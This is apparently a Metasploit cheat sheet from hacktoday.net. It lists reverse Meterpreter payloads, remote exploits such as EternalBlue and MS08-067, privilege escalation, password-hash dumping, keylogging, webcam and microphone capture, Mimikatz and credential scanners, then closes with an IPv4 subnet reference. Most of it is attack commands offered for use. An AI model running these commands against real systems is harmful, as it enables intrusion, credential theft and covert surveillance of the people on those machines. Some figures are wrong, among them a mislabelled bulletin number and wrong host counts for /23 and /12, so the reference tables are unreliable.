Metasploit CheatSheet - hacktoday.
net
Meterpreter Payloads
Windows reverse meterpreter payload
set payload windows/meterpreter/reverse_tcp
Windows VNC Meterpreter payload
set payload windows/vncinject/reverse_tcp
set ViewOnly false
Linux Reverse Meterpreter payload
set payload linux/meterpreter/reverse_tcp
Android Reverse Meterpreter payload
set payload android/meterpreter/reverse_tcp
Meterpreter Cheat Sheet
Command Description
upload file c:\\windows Upload file to Windows target
download c:\\windows\\repair\\sam /tmp Download file from Windows target
execute -f c:\\windows\temp\exploit.exe Run .exe on target
execute -f cmd -c Creates new channel with cmd shell
ps Show processes
shell Get shell on the target
getsystem Attempts privilege escalation on the target
hashdump Dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target Create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target Delete port forward
screenshot Capture screenshot of the target machine
keyscan_start Start keylogger
keyscan_dump Dump collected keystrokes
webcam_snap Take webcam snapshot
record_mic Record microphone
enum_chrome Enumerate Chrome browser data
:computer: Common Metasploit Modules
:closed_lock_with_key: Remote Windows Metasploit Modules (exploits)
Command Description
use exploit/windows/smb/ms08_067_netapi MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index MS09_050 Windows Vista SP1/SP2 and
Server 2008 (x86) Remote Exploit
use exploit/windows/smb/ms17_010_eternalblue MS17_010 EternalBlue SMB Remote Windows Kernel Pool
Corruption
:key: Local
Windows Metasploit Modules (exploits)
Command Description
use exploit/windows/local/bypassuac Bypass UAC on Windows 7 + Set target + arch, x86/64
use exploit/windows/local/ms10_015_kitrap0d MS10_015 Kitrap0d Local Privilege Escalation
:mag:
Auxilary Metasploit Modules
Command Description
use auxiliary/scanner/http/dir_scanner Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version Metasploit MySQL Version Scanner
use auxiliary/scanner/oracle/oracle_login Metasploit Oracle Login Module
:shell:
Metasploit Powershell Modules
Command Description
use exploit/multi/script/web_delivery Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell Metasploit upload and run powershell script through a
session
use exploit/multi/http/jboss_maindeployer Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload Metasploit MSSQL payload
:wrench:
Post Exploit Windows Metasploit Modules
Command Description
run post/windows/gather/win_privs Metasploit show privileges of current user
use post/windows/gather/credentials/gpp Metasploit grab GPP saved passwords
load mimikatz -> wdigest Metasploit load Mimikatz
run post/windows/gather/local_admin_search_enum Identify other machines that the supplied domain
user has administrative access to
:satellite: Networking
:signal_strength: TTL Fingerprinting
Operating SystemTTL Size
Windows 128
Linux 64
Solaris 255
Cisco / Network 255
IPv4 :earth_americas:
Classful IP Ranges :chart_with_upwards_trend:
Note: Class A, B, C are deprecated
Class IP Address Range
Class A :one: 0.0.0.0 – 127.255.255.255
Class B :two: 128.0.0.0 – 191.255.255.255
Class C :three: 192.0.0.0 – 223.255.255.255
Class D :four: 224.0.0.0 – 239.255.255.255
Class E :five: 240.0.0.0 – 255.255.255.255
IPv4 Private Address Ranges :lock:
Class Range
Class A :one: 10.0.0.0 – 10.255.255.255
Class B :two: 172.16.0.0 – 172.31.255.255
Class C :three: 192.168.0.0 – 192.168.255.255
Loopback :repeat: 127.0.0.0 – 127.255.255.255
IPv4 Subnet Cheat Sheet :memo:
CIDR Decimal Mask Number of Hosts
/31 255.255.255.254 1 Host
/30 255.255.255.252 2 Hosts
/29 255.255.255.248 6 Hosts
/28 255.255.255.240 14 Hosts
/27 255.255.255.224 30 Hosts
/26 255.255.255.192 62 Hosts
/25 255.255.255.128 126 Hosts
/24 255.255.255.0 254 Hosts
/23 255.255.254.0 512 Hosts
/22 255.255.252.0 1022 Hosts
/21 255.255.248.0 2046 Hosts
/20 255.255.240.0 4094 Hosts
/19 255.255.224.0 8190 Hosts
/18 255.255.192.0 16382 Hosts
/17 255.255.128.0 32766 Hosts
/16 255.255.0.0 65534 Hosts
/15 255.254.0.0 131070 Hosts
/14 255.252.0.0 262142 Hosts
/13 255.248.0.0 524286 Hosts
/12 255.240.0.0 1048674 Hosts
/11 255.224.0.0 2097150 Hosts
/10 255.192.0.0 4194302 Hosts
/9 255.128.0.0 8388606 Hosts
/8 255.0.0.0 16777214 Hosts